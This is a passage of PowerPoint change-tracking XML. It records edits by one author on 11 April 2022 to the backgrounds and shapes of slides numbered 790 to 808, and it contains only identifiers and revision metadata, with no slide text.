            <ac:spMk id="3" creationId="{6F795ED5-5958-4AEA-B4A2-5DBC95AAE69B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="507710925" sldId="790"/>
            <ac:spMk id="27" creationId="{864105E5-D40C-4230-B87D-5FDF288C3CEB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="282895937" sldId="791"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="282895937" sldId="791"/>
            <ac:spMk id="2" creationId="{B90A0CD6-938D-48FA-B700-88D60ADA5280}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="282895937" sldId="791"/>
            <ac:spMk id="3" creationId="{6F795ED5-5958-4AEA-B4A2-5DBC95AAE69B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3775303543" sldId="792"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3775303543" sldId="792"/>
            <ac:spMk id="2" creationId="{B90A0CD6-938D-48FA-B700-88D60ADA5280}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3775303543" sldId="792"/>
            <ac:spMk id="3" creationId="{6F795ED5-5958-4AEA-B4A2-5DBC95AAE69B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3775303543" sldId="792"/>
            <ac:spMk id="27" creationId="{864105E5-D40C-4230-B87D-5FDF288C3CEB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4171215601" sldId="793"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4171215601" sldId="793"/>
            <ac:spMk id="2" creationId="{B90A0CD6-938D-48FA-B700-88D60ADA5280}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4171215601" sldId="793"/>
            <ac:spMk id="3" creationId="{6F795ED5-5958-4AEA-B4A2-5DBC95AAE69B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4171215601" sldId="793"/>
            <ac:spMk id="27" creationId="{80B10E4C-B1C4-49D4-963D-CA26D1FBD78A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4136448111" sldId="794"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4136448111" sldId="794"/>
            <ac:spMk id="2" creationId="{D7F7D914-285E-4CBA-8562-D58845D10237}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4136448111" sldId="794"/>
            <ac:spMk id="3" creationId="{FACC5BDE-8B12-4E3E-A74B-64FC34ABBFA3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4136448111" sldId="794"/>
            <ac:spMk id="4" creationId="{DF3E022A-14AA-4232-85A2-77A827D29723}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="850799452" sldId="795"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="850799452" sldId="795"/>
            <ac:spMk id="2" creationId="{B8E91F18-5B58-478D-B301-073D929E5364}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="850799452" sldId="795"/>
            <ac:spMk id="6" creationId="{DDB805AE-6FA8-431E-91F7-A0387B64DA10}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3588409791" sldId="796"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3588409791" sldId="796"/>
            <ac:spMk id="2" creationId="{30FAF093-A37B-4817-AC23-D5CD0C957481}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3588409791" sldId="796"/>
            <ac:spMk id="3" creationId="{44145AF4-7098-47BB-A94A-9F07B30352F9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3588409791" sldId="796"/>
            <ac:spMk id="4" creationId="{6587B8AD-54E4-46D8-A0E8-C1FFC67FEC14}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1574732855" sldId="797"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1574732855" sldId="797"/>
            <ac:spMk id="2" creationId="{4C813DBC-0A9D-4601-BF9A-EAAFECD7C17B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1574732855" sldId="797"/>
            <ac:spMk id="3" creationId="{D951AD1D-DECC-4698-A9C1-E3E8161FCA12}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3315177029" sldId="798"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3315177029" sldId="798"/>
            <ac:spMk id="2" creationId="{B8E91F18-5B58-478D-B301-073D929E5364}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3315177029" sldId="798"/>
            <ac:spMk id="6" creationId="{DDB805AE-6FA8-431E-91F7-A0387B64DA10}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2155517974" sldId="799"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2155517974" sldId="799"/>
            <ac:spMk id="2" creationId="{778190F7-4A72-4E4C-B413-A6FDEC6FB760}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2155517974" sldId="799"/>
            <ac:spMk id="5" creationId="{B6C1DA18-8B64-4FC4-8B56-1C161052F3C7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2155517974" sldId="799"/>
            <ac:spMk id="6" creationId="{0C37E743-9371-4AC8-BCCE-BCD7076E745A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3406428531" sldId="800"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3406428531" sldId="800"/>
            <ac:spMk id="2" creationId="{ECD359F9-8302-4604-A77E-22A49BA6D358}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3406428531" sldId="800"/>
            <ac:spMk id="3" creationId="{50B7A448-828F-47B7-8567-B77AFC2B43A8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3406428531" sldId="800"/>
            <ac:spMk id="5" creationId="{D6EE7E4D-BA36-421F-9A90-FF885EA3C9A4}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="11940846" sldId="801"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="11940846" sldId="801"/>
            <ac:spMk id="2" creationId="{070FF970-59F1-4116-BA7B-14BF7D67E0C3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="11940846" sldId="801"/>
            <ac:spMk id="3" creationId="{BEF007EF-E85D-4A36-BE68-102BAE09C875}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2984740271" sldId="802"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2984740271" sldId="802"/>
            <ac:spMk id="2" creationId="{070FF970-59F1-4116-BA7B-14BF7D67E0C3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2984740271" sldId="802"/>
            <ac:spMk id="3" creationId="{BEF007EF-E85D-4A36-BE68-102BAE09C875}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="470682082" sldId="803"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="470682082" sldId="803"/>
            <ac:spMk id="2" creationId="{68352FB8-F241-4593-A4A5-2BBF68C29C96}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="470682082" sldId="803"/>
            <ac:spMk id="3" creationId="{97B30457-20EC-4A0F-BCC2-5B5078D03C0C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2192610790" sldId="804"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2192610790" sldId="804"/>
            <ac:spMk id="2" creationId="{9B4935A7-3F18-4152-8B0E-7D216384A897}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2192610790" sldId="804"/>
            <ac:spMk id="3" creationId="{705736CC-2B09-40D4-889F-3C4805594976}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="769505311" sldId="805"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="769505311" sldId="805"/>
            <ac:spMk id="2" creationId="{B8E91F18-5B58-478D-B301-073D929E5364}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="769505311" sldId="805"/>
            <ac:spMk id="6" creationId="{DDB805AE-6FA8-431E-91F7-A0387B64DA10}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3774470761" sldId="806"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3774470761" sldId="806"/>
            <ac:spMk id="2" creationId="{0EE040B2-4081-4C37-87D2-02C897D0A3DC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3774470761" sldId="806"/>
            <ac:spMk id="5" creationId="{44141C63-B50E-4873-A0C3-32C3C42B5118}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3774470761" sldId="806"/>
            <ac:spMk id="6" creationId="{5B914E10-FC5B-49C7-A43A-63FB2551BDD2}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2782286681" sldId="807"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2782286681" sldId="807"/>
            <ac:spMk id="2" creationId="{4051E2AB-62BD-48A1-833E-3F028FF55C0D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2782286681" sldId="807"/>
            <ac:spMk id="3" creationId="{36C2648B-1F1B-4890-B70D-A6460E896F7A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2782286681" sldId="807"/>
            <ac:spMk id="5" creationId="{616ADE4F-BFF8-453A-BC78-86EE97BF3BE3}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2609063916" sldId="808"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2609063916" sldId="808"/>
            <ac:spMk id="2" creationId="{27E1AACF-2F07-498F-A14E-3BD671A36D06}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2609063916" sldId="808"/>
            <ac:spMk id="3" creationId="{4AE41C7F-9295-495E-9A09-76D3D93159D2}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
